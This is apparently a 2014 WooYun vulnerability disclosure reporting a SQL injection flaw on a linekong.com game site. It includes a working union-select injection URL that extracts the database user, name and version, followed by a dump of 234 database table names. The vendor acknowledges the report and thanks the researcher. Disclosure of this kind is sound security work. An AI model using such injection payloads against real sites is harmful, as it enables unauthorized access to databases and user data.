当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050667

漏洞标题:蓝港在线某站SQL注射漏洞

相关厂商:linekong.com

漏洞作者: se55i0n

提交时间:2014-02-11 18:22

修复时间:2014-03-28 18:23

公开时间:2014-03-28 18:23

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-11: 细节已通知厂商并且等待厂商处理中
2014-02-11: 厂商已经确认,细节仅向厂商公开
2014-02-21: 细节向核心白帽子及相关领域专家公开
2014-03-03: 细节向普通白帽子公开
2014-03-13: 细节向实习白帽子公开
2014-03-28: 细节向公众公开

简要描述:

游戏公司呀~

详细说明:

1)测试注入点:

http://xy.linekong.com/vip/Article.php?article_id=2707%20and%201=2%20union%20select%201,2,user(),4,5,6,7,8,database(),10,11,12,13,14,15,16,17,18,19,20,21,version(),23,24


1.png


2)获取的表信息;

Database: xy_web
[234 tables]
+--------------------------------------------+
| xy_act_oldgame_log                         |
| xy_act_prize_log                           |
| xy_act_prize_log_20131224                  |
| xy_activity_10wan                          |
| xy_activity_10wan_card                     |
| xy_activity_10wan_info                     |
| xy_activity_10wan_info2nd                  |
| xy_activity_10wan_lottery                  |
| xy_activity_20100815                       |
| xy_activity_20100815_info_log              |
| xy_activity_20100815_netpas_code_log       |
| xy_activity_20100815_taobao_invite         |
| xy_activity_20100815_taobao_sales          |
| xy_activity_20100815_taobao_sales_log      |
| xy_activity_2011midautumn_ecard            |
| xy_activity_2011midautumn_items            |
| xy_activity_2011midautumn_userinfo         |
| xy_activity_300wan                         |
| xy_activity_6gift_getlog                   |
| xy_activity_6gift_log                      |
| xy_activity_6gift_sign                     |
| xy_activity_activation_log                 |
| xy_activity_army_draw_log                  |
| xy_activity_army_info                      |
| xy_activity_army_member                    |
| xy_activity_army_vote_log                  |
| xy_activity_armycreate_log                 |
| xy_activity_armygetgift_log                |
| xy_activity_back                           |
| xy_activity_beautyvote_player              |
| xy_activity_beautyvote_voter               |
| xy_activity_blissfulcard_cdkey             |
| xy_activity_blissfulcard_log               |
| xy_activity_brother_activate_log           |
| xy_activity_brother_code_log               |
| xy_activity_bysf_guestbook                 |
| xy_activity_bysf_log                       |
| xy_activity_bysf_passport                  |
| xy_activity_bysf_question                  |
| xy_activity_chit_code                      |
| xy_activity_date                           |
| xy_activity_date_log                       |
| xy_activity_duowanvip_code                 |
| xy_activity_duowanvip_log                  |
| xy_activity_familybattle_army              |
| xy_activity_familybattle_army_back         |
| xy_activity_familybattle_army_prepare      |
| xy_activity_familybattle_army_prepare_back |
| xy_activity_familybattle_armychief         |
| xy_activity_familybattle_armychief_back    |
| xy_activity_familybattle_lottery_log       |
| xy_activity_fenliulottery_log              |
| xy_activity_first_cdkey                    |
| xy_activity_first_cdkey_state              |
| xy_activity_foyuan_cdkey                   |
| xy_activity_foyuan_log                     |
| xy_activity_foyuan_message                 |
| xy_activity_getchit_log                    |
| xy_activity_gg_cdkey                       |
| xy_activity_gg_cdkey_state                 |
| xy_activity_gh_level                       |
| xy_activity_goldeneyes_cdkey               |
| xy_activity_goldeneyes_cdkey_state         |
| xy_activity_goldeneyes_dayinfo             |
| xy_activity_goldeneyes_doublekey           |
| xy_activity_guestbook                      |
| xy_activity_hopewall                       |
| xy_activity_hopewall_bless                 |
| xy_activity_huikui_answer_log              |
| xy_activity_huikui_lottery_log             |
| xy_activity_jh2_log                        |
| xy_activity_jh2_member                     |
| xy_activity_jh2_taobao                     |
| xy_activity_jh2_taobao_log                 |
| xy_activity_jh_log                         |
| xy_activity_jh_member                      |
| xy_activity_jianding_log                   |
| xy_activity_jianmianhui                    |
| xy_activity_jiaozi_log                     |
| xy_activity_joinarmy_log                   |
| xy_activity_journey_cdkey                  |
| xy_activity_journey_cdkey_state            |
| xy_activity_journey_dayinfo                |
| xy_activity_journey_gc                     |
| xy_activity_journey_gc_log                 |
| xy_activity_king_log                       |
| xy_activity_kingbattle_army                |
| xy_activity_kingbattle_army_prepare        |
| xy_activity_kingbattle_armychief           |
| xy_activity_kingbattle_lottery_log         |
| xy_activity_lostself_code_log              |
| xy_activity_lostself_exchange_log          |
| xy_activity_lostself_transfer_log          |
| xy_activity_lover                          |
| xy_activity_lv20_log                       |
| xy_activity_lv20_member                    |
| xy_activity_lv30_log                       |
| xy_activity_lv30_log1                      |
| xy_activity_lv40_card_10                   |
| xy_activity_lv40_card_30                   |
| xy_activity_lv40_log                       |
| xy_activity_lv40_member                    |
| xy_activity_lv60_log1                      |
| xy_activity_makewishes                     |
| xy_activity_makewishes_draw_log            |
| xy_activity_meeting                        |
| xy_activity_name_log                       |
| xy_activity_namegc_log                     |
| xy_activity_neg_player                     |
| xy_activity_neg_voter                      |
| xy_activity_new_act                        |
| xy_activity_newact_itemlog                 |
| xy_activity_newlottery                     |
| xy_activity_newyear_log                    |
| xy_activity_nverguo2                       |
| xy_activity_nverguo_cdkey                  |
| xy_activity_nverguo_log                    |
| xy_activity_old_player                     |
| xy_activity_oldfriends1_gift_log           |
| xy_activity_oldfriends1_verify_inviter     |
| xy_activity_oldfriends_exchange_log        |
| xy_activity_oldfriends_inviter             |
| xy_activity_oldfriends_oldplayer           |
| xy_activity_oldfriends_verify_inviter      |
| xy_activity_opg_card                       |
| xy_activity_opg_log                        |
| xy_activity_opg_turnround_card             |
| xy_activity_opg_turnround_log              |
| xy_activity_opg_user                       |
| xy_activity_package_card                   |
| xy_activity_package_card_log               |
| xy_activity_package_gift_log               |
| xy_activity_pagoda_log                     |
| xy_activity_people_vote_check              |
| xy_activity_people_vote_log                |
| xy_activity_people_vote_man_log            |
| xy_activity_privilege_card                 |
| xy_activity_privilege_log                  |
| xy_activity_qb                             |
| xy_activity_qb2nd                          |
| xy_activity_qb3rd                          |
| xy_activity_qb4th                          |
| xy_activity_qb5th                          |
| xy_activity_qb5th_bak                      |
| xy_activity_qixi                           |
| xy_activity_qmxscj_card                    |
| xy_activity_qmxscj_log                     |
| xy_activity_qqlz                           |
| xy_activity_qqlz_cdkey                     |
| xy_activity_rally_giver                    |
| xy_activity_rally_invitee                  |
| xy_activity_renzheng_log                   |
| xy_activity_rushlevel                      |
| xy_activity_shenlian_cdkey                 |
| xy_activity_shenlian_cdkey_log             |
| xy_activity_song_log                       |
| xy_activity_songfinal_userinfo             |
| xy_activity_songfinal_voteinfo             |
| xy_activity_survey_code                    |
| xy_activity_survey_log                     |
| xy_activity_survey_question                |
| xy_activity_tequan_card                    |
| xy_activity_tequan_log                     |
| xy_activity_vote_log                       |
| xy_activity_vote_query                     |
| xy_activity_welfare_cdkey                  |
| xy_activity_welfare_log                    |
| xy_activity_welfare_message                |
| xy_activity_wudidong_chongji               |
| xy_activity_wudidong_jifen                 |
| xy_activity_xunyou_ge                      |
| xy_activity_xunyou_ge_cdkey                |
| xy_activity_xunyou_log                     |
| xy_activity_xyl                            |
| xy_activity_xyvip_gift_log                 |
| xy_activity_xyvip_log                      |
| xy_activity_zhailing_cdkey                 |
| xy_activity_zhailing_log                   |
| xy_activity_zhanbu                         |
| xy_activity_zhuanpan                       |
| xy_activity_zhuanpan_voucher               |
| xy_activity_zhuanpan_voucher_log           |
| xy_activity_zhufu_bless                    |
| xy_activity_zhufu_log                      |
| xy_activity_zhufu_lottery                  |
| xy_address                                 |
| xy_article                                 |
| xy_article_demo                            |
| xy_article_inserl                          |
| xy_build                                   |
| xy_channel                                 |
| xy_columns                                 |
| xy_comment                                 |
| xy_demo                                    |
| xy_download                                |
| xy_editors_inserl                          |
| xy_flash                                   |
| xy_grading                                 |
| xy_group                                   |
| xy_image                                   |
| xy_image_inserl                            |
| xy_jnh_5173card_log                        |
| xy_jnh_gift                                |
| xy_jnh_gift_log                            |
| xy_jnh_luck                                |
| xy_jnh_luck_log                            |
| xy_jnh_passport_log                        |
| xy_jnh_receive_log                         |
| xy_login_game_history                      |
| xy_lottery_20100209_state                  |
| xy_lottery_count                           |
| xy_lottery_log                             |
| xy_mall_exchange_log                       |
| xy_mall_lottery_log                        |
| xy_member                                  |
| xy_pass_card_list                          |
| xy_pass_card_list_log                      |
| xy_passportstat                            |
| xy_sort                                    |
| xy_special_like_vote                       |
| xy_special_taici_vote                      |
| xy_taobao_voucher                          |
| xy_taobao_voucher_log                      |
| xy_template                                |
| xy_types                                   |
| xy_url                                     |
| xy_url_inserl                              |
| xy_vote                                    |
| xy_vote_inserl                             |
| xy_vote_option                             |
| xy_wj_article                              |
| xy_wj_article_inserl                       |
| xy_wj_image                                |
| xy_wj_image_inserl                         |
+--------------------------------------------+


PS:未深入测试~自行修复

漏洞证明:

1.png

修复方案:

过滤

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-02-11 18:29

厂商回复:

@se55i0n @乌云 特别感谢!! 正在处理!

最新状态:

暂无